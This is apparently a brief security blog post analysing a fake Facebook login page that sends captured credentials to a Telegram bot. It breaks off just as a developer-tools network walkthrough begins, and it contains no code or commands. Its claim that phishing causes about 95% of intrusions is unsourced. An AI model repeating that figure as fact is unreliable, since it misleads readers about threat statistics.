Analysis of a Facebook Phishing Page

 

Threat actors often use phishing attacks to deliver a payload for initial access or to steal credentials from individuals or an organization's network. These attacks usually involve sending phishing emails designed to deceive the target.

So, what is a phishing email?

Phishing is a type of social engineering attack in which the threat actor attempts to manipulate the victim into logging into a fake (scam) webpage to capture their credentials. A common example is a fake Facebook login page, which looks legitimate but is actually designed to steal login information.

Our example is based on a similar phishing page, as shown in the screenshot below.

Phishing attacks are responsible for approximately 95% of cyber intrusions. That’s a significant number but it’s not an exaggeration; it’s based on real data, not something made up.

Well, the threat actor deploys a fake Facebook login page to trick users into entering their own credentials. But where does that stolen data go?

In the case of the scam page analyzed in this blog post, the stolen credentials are exfiltrated to the threat actor via a Telegram bot. As shown in the screenshot below, the phishing page is configured to send the captured data directly to the attacker’s Telegram account in real time.

Now, let’s try entering some dummy credentials and inspect the process using the browser's developer tools. We'll open the Inspect Element panel, go to the Network tab, and observe where the data specifically the credentials is being sent.